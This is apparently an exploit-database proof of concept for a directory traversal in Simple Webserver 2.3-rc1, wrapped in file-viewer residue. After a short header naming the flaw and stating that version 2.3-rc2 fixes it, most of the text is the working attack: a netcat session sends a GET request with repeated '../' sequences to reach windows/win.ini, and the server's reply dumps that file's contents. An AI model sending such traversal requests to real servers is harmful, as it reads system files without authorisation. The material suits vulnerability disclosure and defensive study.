61 lines
No EOL
1.3 KiB
Text
61 lines
No EOL
1.3 KiB
Text
# Exploit Title: Simple Webserver 2.3-rc1 Directory Traversal
|
|
# Date: 01/02/2013
|
|
# Exploit Author: CwG GeNiuS
|
|
# Vendor Homepage: http://www.pmx.it
|
|
# Software Link: http://www.pmx.it/download/sws-2.3-rc1-i686.exe
|
|
# Version: 2.3-rc1 (and earlier)
|
|
# Tested on: Windows 7 Enterprise SP1
|
|
#
|
|
#Vulnerability: When removing the preceding "/" from a GET
|
|
# request the webserver allows directory
|
|
# traversal.
|
|
#
|
|
#Fix: I have spoken with the developer who has now
|
|
# released 2.3-rc2 to correct the vulnerability
|
|
|
|
|
|
|
|
root@bt:~# nc -v 192.168.1.132 80
|
|
192.168.1.132: inverse host lookup failed: Unknown server error : Connection timed out
|
|
(UNKNOWN) [192.168.1.132] 80 (www) open
|
|
GET ../../../../../../../../windows/win.ini http/1.1
|
|
|
|
HTTP/1.1 400 Bad Request
|
|
Server: PMSoftware-SWS/2.3
|
|
Date: Wed, 02 Jan 2013 22:45:2 GMT
|
|
Connection: close
|
|
|
|
HTTP/1.1 200 Ok
|
|
Server: PMSoftware-SWS/2.3
|
|
Date: Wed, 02 Jan 2013 22:45:2 GMT
|
|
Accept-Ranges: bytes
|
|
Content-type:
|
|
Content-Length: 403
|
|
|
|
; for 16-bit app support
|
|
[fonts]
|
|
[extensions]
|
|
[mci extensions]
|
|
[files]
|
|
[Mail]
|
|
MAPI=1
|
|
[MCI Extensions.BAK]
|
|
3g2=MPEGVideo
|
|
3gp=MPEGVideo
|
|
3gp2=MPEGVideo
|
|
3gpp=MPEGVideo
|
|
aac=MPEGVideo
|
|
adt=MPEGVideo
|
|
adts=MPEGVideo
|
|
m2t=MPEGVideo
|
|
m2ts=MPEGVideo
|
|
m2v=MPEGVideo
|
|
m4a=MPEGVideo
|
|
m4v=MPEGVideo
|
|
mod=MPEGVideo
|
|
mov=MPEGVideo
|
|
mp4=MPEGVideo
|
|
mp4v=MPEGVideo
|
|
mts=MPEGVideo
|
|
ts=MPEGVideo
|
|
tts=MPEGVideo |